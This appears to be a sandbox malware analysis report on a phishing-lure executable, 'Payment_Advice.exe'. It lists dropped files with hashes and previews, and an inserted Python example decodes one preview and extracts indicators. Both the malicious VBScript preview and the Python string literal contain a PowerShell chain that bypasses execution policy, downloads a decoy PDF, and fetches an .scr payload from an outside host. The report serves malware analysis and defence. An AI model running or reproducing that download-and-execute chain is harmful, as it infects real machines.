                                                    Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"155268ffec5c5934bdc581188be25297","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1714569441000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"126522d340aa5125b961831f70e01a51","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":1372,"ts":1714569441000},{"id":"Edit_InApp_Aug2020","info":{"dg":"bfa7514a148c16c0619675a0b9a155c5","sid":"Edit_InApp_Aug2020"},"mimeType":"file","size":782,"ts":1714569441000},{"id":"DC_Reader_RHP_Banner","info":{"dg":"ff7934f37b8162ec1d83b7bec38bf26c","sid":"DC_Reader_RHP_Banner"},"mimeType":"file","size":1395,"ts":1714569441000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"5e8fe773946a972688d8c72f739ad38c","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1714569441000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"93b5a62877b3e7b24d2c13612c415b35","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","size":289,"ts":1714569441000},
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                                    Category:dropped
                                                    Size (bytes):12288
                                                    Entropy (8bit):1.4515633555554874
                                                    Encrypted:false
                                                    SSDEEP:48:TGufl2GL7msCvrBd6dHtbGIbPe0K3+fDy2dsflp:lNVmsw3SHtbDbPe0K3+fDZdU
                                                    MD5:D6191CE835867178F54AC45EAF562B42
                                                    SHA1:61587447BBEA623C9DBC4023644B8136B5B7DE9B
                                                    SHA-256:5A38505095AFBF15FAFF45F9E5A523E0CA4D986C32175F4D3C3A279A6B423B44
                                                    SHA-512:EA7398D850B02AEDE26A70C53C52839DD87D9B1B9DD3A1FE1D4D76CB402527C32E391B401BCDD7AED28431483647E6B1DE733CA426FE2E00BF23133D25800267
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:SQLite Rollback Journal
                                                    Category:dropped
                                                    Size (bytes):8720
                                                    Entropy (8bit):1.953630380360256
                                                    Encrypted:false
                                                    SSDEEP:48:7MTrvrBd6dHtbGIbPe0K3+fDy2dsW7qFl2GL7msy:7u3SHtbDbPe0K3+fDZdLKVmsy
                                                    MD5:46B9DFA88BA44FEC9BB23F1276A5623E
                                                    SHA1:B01544788640E91A693BDDC68EEFEDB53484D0E8
                                                    SHA-256:F22786A2A5FBCCFF1ED93CD85483CE901B9E509A9E7B9B99742ECFE3C19C603C
                                                    SHA-512:27B5BF200C21AF480649005E96FA0A24C5BBE1862D5C0D298ED69F7FFC6F8A43C356591878DDFD5AF1984B6DF0347497314FAD70ADCCC0D808112183895A36AB
                                                    Malicious:false
                                                    Preview:.... .c.......1.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................v.../.././././....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Users\user\Desktop\Payment_Advice.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):706
                                                    Entropy (8bit):5.349842958726647
                                                    Encrypted:false
                                                    SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAq1KDLI4M9XKbbDLI4MWuPJKAVKhat92n4M6:MLUE4K5E4KH1qE4qXKDE4KhKiKhg84j
                                                    MD5:9BA266AD16952A9A57C3693E0BCFED48
                                                    SHA1:5DB70A3A7F1DB4E3879265AB336B2FA1AFBCECD5
                                                    SHA-256:A6DFD14E82D7D47195A1EC7F31E64C2820AB8721EF4B5825E21E742093B55C0E
                                                    SHA-512:678E1F639379FC24919B7CF562FA19CE53363CBD4B0EAB66486F6F8D5DD5958DE3AAE8D7842EE868EFCC39D907FDC1A3ACF464E29D37B0DAEE9874C39730FE8E
                                                    Malicious:false
                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
                                                    Process:C:\Windows\Temp\hadvices.scr
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):706
                                                    Entropy (8bit):5.349842958726647
                                                    Encrypted:false
                                                    SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAq1KDLI4M9XKbbDLI4MWuPJKAVKhat92n4M6:MLUE4K5E4KH1qE4qXKDE4KhKiKhg84j
                                                    MD5:9BA266AD16952A9A57C3693E0BCFED48
                                                    SHA1:5DB70A3A7F1DB4E3879265AB336B2FA1AFBCECD5
                                                    SHA-256:A6DFD14E82D7D47195A1EC7F31E64C2820AB8721EF4B5825E21E742093B55C0E
                                                    SHA-512:678E1F639379FC24919B7CF562FA19CE53363CBD4B0EAB66486F6F8D5DD5958DE3AAE8D7842EE868EFCC39D907FDC1A3ACF464E29D37B0DAEE9874C39730FE8E
                                                    Malicious:false
                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):11608
                                                    Entropy (8bit):4.887486353364779
                                                    Encrypted:false
                                                    SSDEEP:192:Pxoe5lpOdxoe56ib49Vsm5emdzVFn3eGOVpN6K3bkkjo5LgkjDt4iWN3yBGHB9sT:lVib49PVoGIpN6KQkj2kkjh4iUx4cYK6
                                                    MD5:E3CC2E628C73E9D29D58817DFC1ADCC5
                                                    SHA1:3720336F2BCB67ADACD9FED9645AC3FFDC67928D
                                                    SHA-256:6C52B5B7085CA1A5EB18B7C7FF740BEC18D0911CCF7B321B4668EF725A912F3B
                                                    SHA-512:6C5DC96D036DD24BE29720F1568EE70DB069EE5F3F91D59289A9E597C699D4BEBEBA5525B43B3BC7EAE3D467211C6826137FEF1A57E42593DB6E308A2237EE32
                                                    Malicious:false
                                                    Preview:PSMODULECACHE......e..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.............z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):64
                                                    Entropy (8bit):1.1940658735648508
                                                    Encrypted:false
                                                    SSDEEP:3:Nlllul3nqth:NllUa
                                                    MD5:851531B4FD612B0BC7891B3F401A478F
                                                    SHA1:483F0D1E71FB0F6EFF159AA96CC82422CF605FB3
                                                    SHA-256:383511F73A5CE9C50CD95B6321EFA51A8C6F18192BEEBBD532D4934E3BC1071F
                                                    SHA-512:A22D105E9F63872406FD271EF0A545BD76974C2674AEFF1B3256BCAC3C2128B9B8AA86B993A53BF87DBAC12ED8F00DCCAFD76E8BA431315B7953656A4CB4E931
                                                    Malicious:false
                                                    Preview:@...e.................................&..............@..........
                                                    Process:C:\Users\user\Desktop\Payment_Advice.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):1634
                                                    Entropy (8bit):3.551963477893781
                                                    Encrypted:false
                                                    SSDEEP:24:T8umgCjOO5OWWeiVhfzBpnUMkWBiGfzzX+mzUMkWD+m862DeynNCjOy3:T8upCjO2We+tfHY8bLHLB2DlnIjd3
                                                    MD5:95DB312E30DD0364924E7B45D1AB6FA8
                                                    SHA1:1FF6577F81C4DF9FC6BF0B91E7421E46A24D43DE
                                                    SHA-256:E469EA6ED5267E8984305A6F6EFCB3D2942199B80E06C340C7199B82CFF230F9
                                                    SHA-512:6236BE94169639CB2B202B7741256CA1A3E39E8DE8AAA14A957F2BD18FE1953DAD3ACA2BB2597505EE2C7120DB6D34FC4C5CBB9756945034CAF00FC7F553AAD5
                                                    Malicious:true
                                                    Preview:S.u.b. .R.u.n.P.o.w.e.r.S.h.e.l.l.C.o.m.m.a.n.d.(.)..... . . . .D.i.m. .o.b.j.S.h.e.l.l.,. .p.s.C.o.m.m.a.n.d......... . . . .'. .C.r.e.a.t.e. .S.h.e.l.l. .o.b.j.e.c.t..... . . . .S.e.t. .o.b.j.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)......... . . . .'. .C.o.m.b.i.n.e.d. .P.o.w.e.r.S.h.e.l.l. .c.o.m.m.a.n.d.s. .t.o. .r.u.n..... . . . .p.s.C.o.m.m.a.n.d. .=. .".p.o.w.e.r.s.h.e.l.l...e.x.e. .-.E.x.e.c.u.t.i.o.n.P.o.l.i.c.y. .B.y.p.a.s.s. .-.C.o.m.m.a.n.d. .".".I.n.v.o.k.e.-.W.e.b.R.e.q.u.e.s.t. .-.U.r.i. .'.h.t.t.p.s.:././.a.d.v.i.s.i.n.g.-.r.e.c.e.i.p.t.s...c.o.m./.h.s.b.c./.P.a.y.m.e.n.t._.A.d.v.i.c.e...p.d.f.'. .-.O.u.t.F.i.l.e. .'.C.:.\.U.s.e.r.s.\.P.u.b.l.i.c.\.P.a.y.m.e.n.t._.A.d.v.i.c.e...p.d.f.'.;. .S.t.a.r.t.-.P.r.o.c.e.s.s. .'.C.:.\.U.s.e.r.s.\.P.u.b.l.i.c.\.P.a.y.m.e.n.t._.A.d.v.i.c.e...p.d.f.'.;. .I.n.v.o.k.e.-.W.e.b.R.e.q.u.e.s.t. .-.U.r.i. .'.h.t.t.p.s.:././.a.d.v.i.s.i.n.g.-.r.e.c.e.i.p.t.s...c.o.m./.h.s.b.c./.h.a.d.v.i.c.e.s...s.c.r.'. .-.
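Added example, not part of the report and not Joe Sandbox code: the VBScript record above is stored as UTF-16LE, and the Preview column prints every non-printable byte, including the NUL high byte of each character, as ".", which is why the script reads as dotted text. The Python below recovers the script from that rendering and pulls the URLs, local paths, cmdlets and ExecutionPolicy setting out of the embedded PowerShell command. The only input is the Preview string copied from the record above (constructed as a literal here, and truncated where the report truncates it); the extension list used to separate the .scr stage from the decoy PDF is an assumption.

```python
"""Recover a UTF-16LE dropped script from a sandbox "Preview" field and pull its IOCs.

Added example; not part of the Joe Sandbox report and not Joe Sandbox code. The report
renders every non-printable byte as ".", so an ASCII script stored as UTF-16LE shows up
as letters interleaved with dots. The text is the even-indexed characters.
"""
import re

# Constructed input: the Preview field of the 1634-byte VBScript record, copied from the
# report. The report truncates the preview, so the second -OutFile argument is cut here too.
PREVIEW = (
    r"""S.u.b. .R.u.n.P.o.w.e.r.S.h.e.l.l.C.o.m.m.a.n.d.(.)..... . . . .D.i.m. .o.b.j.S.h.e.l.l.,. .p.s.C.o.m.m.a.n.d........."""
    r""" . . . .'. .C.r.e.a.t.e. .S.h.e.l.l. .o.b.j.e.c.t..... . . . .S.e.t. .o.b.j.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)........."""
    r""" . . . .'. .C.o.m.b.i.n.e.d. .P.o.w.e.r.S.h.e.l.l. .c.o.m.m.a.n.d.s. .t.o. .r.u.n..... . . . .p.s.C.o.m.m.a.n.d. .=. .".p.o.w.e.r.s.h.e.l.l...e.x.e. """
    r""".-.E.x.e.c.u.t.i.o.n.P.o.l.i.c.y. .B.y.p.a.s.s. .-.C.o.m.m.a.n.d. .".".I.n.v.o.k.e.-.W.e.b.R.e.q.u.e.s.t. .-.U.r.i. """
    r""".'.h.t.t.p.s.:././.a.d.v.i.s.i.n.g.-.r.e.c.e.i.p.t.s...c.o.m./.h.s.b.c./.P.a.y.m.e.n.t._.A.d.v.i.c.e...p.d.f.'. .-.O.u.t.F.i.l.e. """
    r""".'.C.:.\.U.s.e.r.s.\.P.u.b.l.i.c.\.P.a.y.m.e.n.t._.A.d.v.i.c.e...p.d.f.'.;. .S.t.a.r.t.-.P.r.o.c.e.s.s. .'.C.:.\.U.s.e.r.s.\.P.u.b.l.i.c.\.P.a.y.m.e.n.t._.A.d.v.i.c.e...p.d.f.'.;. """
    r""".I.n.v.o.k.e.-.W.e.b.R.e.q.u.e.s.t. .-.U.r.i. .'.h.t.t.p.s.:././.a.d.v.i.s.i.n.g.-.r.e.c.e.i.p.t.s...c.o.m./.h.s.b.c./.h.a.d.v.i.c.e.s...s.c.r.'. .-."""
)

# Assumed list of extensions that mark a fetched file as a stage rather than a decoy.
EXECUTABLE_EXTENSIONS = {"scr", "exe", "dll", "ps1", "vbs", "js", "jse", "hta", "bat", "cmd", "msi"}

URL_RE = re.compile(r"https?://[^\s'\"]+")
WIN_PATH_RE = re.compile(r"[A-Za-z]:\\[^\s'\";]+")
CMDLET_RE = re.compile(
    r"\b(Invoke-WebRequest|Invoke-RestMethod|Invoke-Expression|Start-Process|Start-BitsTransfer)\b"
)
EXEC_POLICY_RE = re.compile(r"-ExecutionPolicy\s+(\w+)", re.IGNORECASE)
START_PROCESS_RE = re.compile(r"Start-Process\s+'([^']+)'")


def is_utf16_preview(preview: str) -> bool:
    """True when the rendering is NUL-interleaved UTF-16LE ASCII: even length and a "."
    (the NUL high byte) at every odd index."""
    return len(preview) % 2 == 0 and all(c == "." for c in preview[1::2])


def recover_utf16_preview(preview: str) -> str:
    """Return the low byte of each code unit. CR and LF are non-printable as well, so
    line breaks survive only as "." in the result; that is enough for IOC extraction."""
    if not is_utf16_preview(preview):
        raise ValueError("preview is not NUL-interleaved UTF-16LE text")
    return preview[0::2]


def extract_iocs(script: str) -> dict:
    """Pull the network and host indicators out of recovered script text."""
    urls = list(dict.fromkeys(URL_RE.findall(script)))        # dedupe, keep order
    paths = list(dict.fromkeys(WIN_PATH_RE.findall(script)))
    policy = EXEC_POLICY_RE.search(script)
    opened = START_PROCESS_RE.search(script)
    return {
        "urls": urls,
        # Anything fetched with an executable extension is a stage, not a decoy.
        "executable_urls": [u for u in urls if u.rsplit(".", 1)[-1].lower() in EXECUTABLE_EXTENSIONS],
        "paths": paths,
        "cmdlets": CMDLET_RE.findall(script),
        "execution_policy": policy.group(1) if policy else None,
        # The file the script opens for the victim; a document here is the decoy.
        "decoy": opened.group(1) if opened else None,
    }


def triage(preview: str) -> dict:
    """Full pipeline: recover the script from its preview, then extract IOCs."""
    script = recover_utf16_preview(preview)
    result = extract_iocs(script)
    result["script"] = script
    return result


if __name__ == "__main__":
    r = triage(PREVIEW)
    print(r["script"])
    for key in ("urls", "executable_urls", "paths", "cmdlets", "execution_policy", "decoy"):
        print(f"{key}: {r[key]}")
```

The even-index trick only holds for ASCII content in UTF-16LE; `is_utf16_preview` guards against applying it to a UTF-8 or binary preview, where the odd positions are not all dots. For the record above it yields the wscript-to-powershell chain the Sigma hits describe: `-ExecutionPolicy Bypass`, a PDF downloaded to C:\Users\Public and opened as the decoy, then hadvices.scr fetched from the same host.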
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):246
                                                    Entropy (8bit):3.5030768995714583
                                                    Encrypted:false
                                                    SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K80QQRIKlYH:Qw946cPbiOxDlbYnuRKzI+YH
                                                    MD5:4D83892F6EE2B2F86D3DDAECFF1250E2
                                                    SHA1:465969122223224693317BE1690A094D01922271
                                                    SHA-256:DC42AA189D385A5C32B20A5DCDF2F0FD7399166A02A9CD7CAAD3442597268415
                                                    SHA-512:616F4D855782B76E6D8612CEAA0CA6452DBFA383000BE9F4DA0B2EFF0515F6B7A50C9F0AF44A2DAE0D0EC083E23F3F7DCAABB8C10FBF943E213AF85199F79950
                                                    Malicious:false
                                                    Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .0.1./.0.5./.2.0.2.4. . .1.5.:.1.7.:.2.0. .=.=.=.....
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:ASCII text, with very long lines (393)
                                                    Category:dropped
                                                    Size (bytes):16525
                                                    Entropy (8bit):5.386483451061953
                                                    Encrypted:false
                                                    SSDEEP:384:A2+jkjVj8jujXj+jPjghjKj0jLjmF/FRFO7t75NsXNsbNsgNssNsNNsaNsliNsTY:AXg5IqTS7Mh+oXChrYhFiQHXiz1W60ID
                                                    MD5:F49CA270724D610D1589E217EA78D6D1
                                                    SHA1:22D43D4BB9BDC1D1DEA734399D2D71E264AA3DD3
                                                    SHA-256:D2FFBB2EF8FCE09991C2EFAA91B6784497E8C55845807468A3385CF6029A2F8D
                                                    SHA-512:181B42465DE41E298329CBEB80181CBAB77CFD1701DBA31E61B2180B483BC35E2EFAFFA14C98F1ED0EDDE67F997EE4219C5318CE846BB0116A908FB2EAB61D29
                                                    Malicious:false
                                                    Preview:SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:808+0200 ThreadID=6044 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):15111
                                                    Entropy (8bit):5.366813486546421
                                                    Encrypted:false
                                                    SSDEEP:384:7cY9IIpM9KK/tqd8GJUcQj8MRpfgGWNr49Kk8qTFKTpbacTUB8aE1EJY1/yDogwT:oW
                                                    MD5:90035F3ACDDB6B05B7A39E7282D8A843
                                                    SHA1:7B1F551D29B8E7979D25D31BD4344E99D7E18696
                                                    SHA-256:525EC9E8A070C938C98B76AA2533B6F4791A9C34045E2551679749843DC1DACA
                                                    SHA-512:787762D9F596F1BBCE2CAE4F6E1B69ECD4192D502C12A1B118D6535C9B9142346ACAEF9B95BB0F2AB7C5B18087A0DE0BCCD0BD46134D453B22D571C2A51F8075
                                                    Malicious:false
                                                    Preview:SessionID=09abd8c7-8e20-4434-9928-8825cb929d21.1714569431270 Timestamp=2024-05-01T15:17:11:270+0200 ThreadID=7716 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=09abd8c7-8e20-4434-9928-8825cb929d21.1714569431270 Timestamp=2024-05-01T15:17:11:271+0200 ThreadID=7716 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=09abd8c7-8e20-4434-9928-8825cb929d21.1714569431270 Timestamp=2024-05-01T15:17:11:271+0200 ThreadID=7716 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=09abd8c7-8e20-4434-9928-8825cb929d21.1714569431270 Timestamp=2024-05-01T15:17:11:271+0200 ThreadID=7716 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=09abd8c7-8e20-4434-9928-8825cb929d21.1714569431270 Timestamp=2024-05-01T15:17:11:271+0200 ThreadID=7716 Component=ngl-lib_NglAppLib Description="SetConf
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):35721
                                                    Entropy (8bit):5.409948720880984
                                                    Encrypted:false
                                                    SSDEEP:768:hRDD/ATOlQwlgR6RgRT4xk1Bh9+R6gRldy0+AyxkHBDgRh9gRc:hRDD/ATOlQwlgR6RgRT4xk1Bh9+R6gRW
                                                    MD5:D389049B18267087CDA342F54E299486
                                                    SHA1:717FCFAC73E136101843780D545E792F5A9BD46A
                                                    SHA-256:4B08B1A0E522A05FBEDF2A1F2D02D74405F9A8A0FC4A8042F42152B14AFAA9FB
                                                    SHA-512:BA610BFD7D606265DCD0FA0FCFDDB1DC6D09187B985E735636D89E9B78AF8102DE53BBEBB273D66ECD9B0EEB98813550BB33DC0BC102EAB3EE4F8D945FEABDD0
                                                    Malicious:false
                                                    Preview:05-10-2023 08:41:17:.---2---..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 08:41:17:.Closing File..05-10-
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                    Category:dropped
                                                    Size (bytes):1407294
                                                    Entropy (8bit):7.97605879016224
                                                    Encrypted:false
                                                    SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R077WLaGZ7YYIGNPpe:JVB3mlind9i4ufFXpAXkrfUs03WLaGZ4
                                                    MD5:C57D91A805775D5A645457EBBB9EAF26
                                                    SHA1:D407ABE7E7C9A9C78346CA781EB1B77E61060250
                                                    SHA-256:149A8DA0889E336CBA0CF06D34DDA729E69CA491E8B8FCEDD6C0DD5647BB6D43
                                                    SHA-512:1E7C93F0702D97F4E911C3EA029E599CF93BBA9C17156D95F1B301CA53C643F55582105E86572550C02E549A58841EEA64E038B7858703AF5453F1A37B1F3C29
                                                    Malicious:false
                                                    Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                    Category:dropped
                                                    Size (bytes):1419751
                                                    Entropy (8bit):7.976496077007677
                                                    Encrypted:false
                                                    SSDEEP:24576:/xA7owWLaGZDwYIGNPJodpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JVwWLaGZDwZGk3mlind9i4ufFXpAXkru
                                                    MD5:18E3D04537AF72FDBEB3760B2D10C80E
                                                    SHA1:B313CD0B25E41E5CF0DFB83B33AB3E3C7678D5CC
                                                    SHA-256:BBEF113A2057EE7EAC911DC960D36D4A62C262DAE5B1379257908228243BD6F4
                                                    SHA-512:2A5B9B0A5DC98151AD2346055DF2F7BFDE62F6069A4A6A9AB3377B644D61AE31609B9FC73BEE4A0E929F84BF30DA4C1CDE628915AC37C7542FD170D12DE41298
                                                    Malicious:false
